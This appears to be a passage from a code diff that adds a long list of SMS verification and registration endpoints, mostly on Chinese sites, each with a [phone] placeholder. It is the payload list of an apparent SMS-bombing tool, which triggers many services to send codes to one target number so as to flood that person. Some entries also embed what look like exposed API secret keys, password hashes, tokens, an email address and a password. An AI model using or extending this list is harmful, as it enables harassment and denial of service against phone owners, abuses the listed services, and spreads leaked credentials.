"http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]", + "http://api.sms.cn/sms/?ac=send&uid=sun98&pwd=5a509d25c595fcec2561652992f1915b&template=542423&mobile=[phone]&content={%22code%22:%22HQ98B%22}", + "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", + "http://www.709088000.top/api.php?act=user&key=5E3DSmoFEEvDEJWpiz&phone=[phone]", + "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=773", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=\u60a8\u7684\u624b\u673a\u9a8c\u8bc1\u7801\u4e3a\uff1a3973+\uff0c\u8be5\u9a8c\u8bc1\u780110%", + "http://www.v5kf.com/member/index/ajax_get_sms_code?mobile=[phone]", + "http://www.mgff.com/passport/send_mobile_yzm?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://www.1314.buzz/index.php?hm=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]/mineTker", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "http://www.xjggjy.com/platform/service/users/register/sendMessage?mobile=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", + "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=%E9%BD%90%E6%99%A8&fromurls=http%3A%2F%2Fwww.mianfeidianhua.net%2Fhsnzy.html&content=%E6%83%B3%E5%92%A8%E8%AF%A2%E3%80%82&did=382&uid=2010131726&phone=[phone]&_=1551173567919", + "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=bdfa0471b3354eba9d5a424121bdf37c&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", + "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]&needcode=false", + "https://www.sztianjinsuo.com/user/sendPhoneCode?smsType=register&phone=[phone]", + "http://www.meisupic.com/user.php?act=ajax_validate_sms&bizcode=11&captcha=type=5&mobile=[phone]", + "https://pass.hujiang.com/v2/api/v1/sms/send?action=SendMsg&mobile=[phone]", + "http://h.zy40.cn/dx/index.php?hm=[phone]", + "http://photograph.yuanlikj.cn/send/Send?appName=%E6%88%AA%E5%9B%BE%E7%A7%80-%E5%AF%B9%E8%AF%9D%E7%94%9F%E6%88%90%E5%99%A8&TELMobile=[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", + "http://www.wish3d.com/chitAppValidate.action id=[phone]", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]", + "http://cuckooshop.cn/SMS?phone=[phone]", + "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", + "http://www.12366.com/front/userInfo/sendRegisterMessage loginName=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]", + "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", + "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://ka.niwodai.com/loans-mobile/validatecode.do?method=refresh&date=1557210332912interval=60&phone=[phone]", + "http://www.variflight.com/login/reg/sendSms?AE71649A58c77&phone=[phone]", + "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1575815921608", + "http://haojue78.com/WS/WSAccount.asmx/SendMobileMsg?mobile=[phone]", + "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://www.gmsweipai.com/gms/api/common/[phone]", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]", + "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=+86[phone]", + "http://sso1.nlc.cn/sso/currency/sendCodeToMobile?mobile=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]", + "http://www.51zouchuqu.com/sms/send?mobileNo=[phone]", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "https://www.sww.com.cn/login/captcha?0.8916150596759647&sms_captcha=phone_num=[phone]", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://liuyan.people.com.cn/verifycode/rand4?t=1603181060151&verCode=phoneNum=[phone]", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]", + "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]", + "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", + "http://www.900index.com/api.php?a=sendsms+m=index+mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi 4A&osLevel=23&phone=[phone]", + "https://user.zixia.com/class/CAP/codeshow.php?sid=2090&quhao=86appname=cellphonereg&action=sendcode&yzidcode=[phone]", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8,1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", + "http://api.zhuangdianbi.com/api/sendSms?phone=[phone]", + "https://ly.hao315.com/MsgYzm.php?tel=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", + "http://mall.95572.com/mobile/member/register/web/captcha?mobile=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=865499038835144&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://passport3.pcgames.com.cn/passport3/api/sendVerificationCode.jsp?mobile=[phone]", + "http://www.hongzhoukan.com/ajax/check_tel_reg.php?mobile=[phone]", + "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", + "http://218.57.131.146/cwbase/ep/handlers/RouteHandler.ashx?action=GetPhoneVerCode&PhoneNum=action=GetPhoneVerCode&PhoneNum=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=4080fdef3cb44298852d226af95b2502&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://www.zhichiwangluo.com/index.php?r=Login/phoneResetCode&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery17205960549095114636_1596719990361&req_time=1596720031540&mobile=[phone]&unicom_number=0&_=1596720031543", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "http://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.cgv.com.cn/mem/getRegCapCha.fo?MOBILE_NO=[phone]", + "http://www.jsvideo.tv/sendMsg?phone=[phone]", + "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=4080fdef3cb44298852d226af95b2502&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", + "http://wx.imlaidian.com/testapi/authCodeGet?callback=jQuery1113009964326163753867_1483628589051&mobile=[phone]", + "https://card.10010.com/ko-order/messageCaptcha/send?phoneVal=[phone]", + "http://www.yijiej.com/user/getVerifyCode?phone=[phone]", + "http://manage.univisa.cn/posts/random?callback=jQuery111308764434818808016_1596972033456&phone=target=mobile&mobile=[phone]", + "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]", + "http://www.ind4.net/pc/member/sendRegisterSms.do?phoneNumber=[phone] &_=1502021540432", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "https://www.114yygh.com/web/common/verify-code/get?_time=1592546859053&mobile=[phone]&smsKey=LOGIN", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "http://api.jb669.com:9000/jinbang/login/verifyPhone.do?phoneCode=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://micservice.91qinqu.com/huieryun-identity/api/v1/authgateway/91qq/sendsms?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "https://member.chinaacc.com/api/SmsCode.shtm?jsonpCallback=success_jsonpCallback&siteId=3&mobilePhone=[phone]", + "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", + "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", + "http://passport.lotour.com/reg/sendPhoneCode?callback=jQuery183022448778548277915_1465551896265&mobile=[phone]", + "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", + "http://www.gmmc.com.cn/ajax/H5Handler.ashx?method=SendH5VerCode&mobile=[phone]", + "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "https://api.botbrain.ai/fish/v1/login/captcha?dt=1578983039143&guid=12739063-4134-3aa6-d867-8a912fce4104&sid=e267b2e5-9134-3aa6-d867-8be4bc4334b7&plt=android&uid=&mobile=%20[phone]&type=bind", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw==&phone=[phone]", + "http://bj.iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "http://ruzhu.jd.com/user/sendVC?phone=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "https://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://www.nacao.org.cn/eportal/ui?moduleId=692a74d178a7426180fa08f4b5531330&struts.portlet.action=/portlet/yzm!sendMsg.action&telPhone=[phone]&yzm=H137", + "https://mktmain.daikuan.360.cn/activity/pcguide/cdsmsCode?callback=_360jr1603842207037&mobile=[phone]", + "http://webapp.qianbao188.aloestec.com/v2/app/pub/channel/smsCode?phone=[phone]", + "http://api.midukanshu.com/auth/mobileVerify?mobile=[phone]", + "http://maintain.yunzhandata.com/internal/customer/sendcode.json?mobile=[phone]", + "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=13058226398&national_code=86&from=1&bkn=1557826707&_=1596758267792", + "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]&msgInterval=60&imageCode=&countryCode=86&country=CN&_=1594952633566", + "http://ct.ctrip.com/me/register/Verify?name=%E5%90%B4%E5%A5%87&email=357058116%40qq.com&mobile=[phone]&passwd=xiyu8187", + "http://101.132.126.166:8080/message/sendVerifyCode?callback=successCallback&mobilePhone=&t=1589625247333action_type=regist&mobile=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", + "http://channel.xianjinxia.com/act/light-loan-xjx/registerCodeV3?picCode=0&phone=[phone]", + "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", + "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", + "http://yunrg3866.xahost.yunrg.com/api.php?act=user&key=hz&phone=[phone]", + "https://api.daishangqian.com/v3/user/send-sms-code?phone=[phone]", + "http://passport.lotour.com/reg/sendPhoneCode?callback=&_=&mobile=[phone]", + "http://www.booms.ga/index.php?hm=[phone]", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO+6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC+/CA&phone=[phone]", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", + "https://www.xxwolo.com/ccsrv/apph5/sendShortMsg?phone=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]", + "https://msgo.10010.com/lsd-message/send/captcha/phone/v1?phoneNumber=&event=mobileloginusername=86-[phone]", + "http://www.ydhz.xyz/index.php?hm=[phone]", + "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", + "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]", + "https://sso.agora.io/api/verify/sms?phone=%2B86+131+5822+6398&lang=cn&country=CN&captcha=[phone]", + "https://www.znds.com/plugin.php?id=tshuz_smslogin:mobile&mod=send&phone=[phone]&type=1&hash=e5038cde", + "http://sms.321mh.com/user/v1/sendsms?mobile=[phone]&service=zymk&countryCode=&imgCode=&refresh=0&localtime=&client-channel=store_tencent&loglevel=3&client-type=android&client-version=4.9.1", + "http://zntouzi.com/front/account/verifyMobileForReg?randomID=d2b07acd-917c-4d81-a849-9c694f25833b&code=111111&mobile=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303956739664829656_1592495501835&phone=[phone]&type=5&nation=CN&from_domain=yjs_h5&verifycode=&_=1592495526803", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "http://survey.dxy.cn/forms/public/survey2/captcha?sid=102998&itemid=127053&phone=[phone]", + "http://m.nsyh001.com/user/ajax/Btnmobileverify?user_name=[phone]", + "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "https://www.zhufuc.com/admin/api/center/code/verifycode?ran=0.25068726233475025&type=5&verifycode=[phone]", + "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584431770018", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1490030472329&req_time=1490030480322&user_id=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=#code#=321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "https://www.diantoushi.com/user/v2/captcha?mobile=[phone]", + "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]&platform=2&realVer=3.2.2&region=zh-CN&time_zone=28800&type=0&unlogin_token=724767db76a9c95e817d0101be771480&version_code=138", + "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "https://passport.1yyg.com/JPData?action=send2Msg+userMobile=[phone]", + "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031×tamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "https://open.shiguangkey.com/api/udb/verifycode/get/smscode?phone=86-[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]", + "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]&type=register&_=1582428078447", + "https://api-v5-0.yangcong345.com/captchas/v4.8?phone=[phone]&code=CN&type=codeVerify", + "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", + "http://m.zy40.cn/dx/index.php?hm=[phone]", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", + "https://www.xiaoying.com/user/apiCheckRegister?callback=jQuery19105981196630189294_1488300711819&mobile=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]", + "http://bank.wo.cn/hand/getRandCode?phone=[phone]&flag=3", + "http://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.020283224898892227?mobileNo=[phone]&geetest_challenge=&geetest_validate=&geetest_seccode=", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "http://1314.buzz:80/index.php?hm=[phone]&ok=", + "https://jiameng.baidu.com/portal/com/captcha?ajax=1&device=pc[phone]", + "http://wap.yunxin123.com/index/getregcode/bid/yunxin?mobile=[phone]", + "https://www.midea.cn/next/user_assist/getverifycode?mobile=[phone]", + "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", + "http://www.97sq.com/dx/index.php?hm=[phone]", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]", + "https://passport.chinagoldcoin.net/user/checkAuthCode?mobile=[phone]", + "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone 6s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://wap.ghs.net/wap/wxregister-checkMobile.html?uname=[phone]", + "http://www.gangaimall.com:80/mbb-web/api/account/code?mobile=[phone]&type=0", + "http://www.wfggw.com/getcode.asp?num=&d&_=1480403250456", + "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + 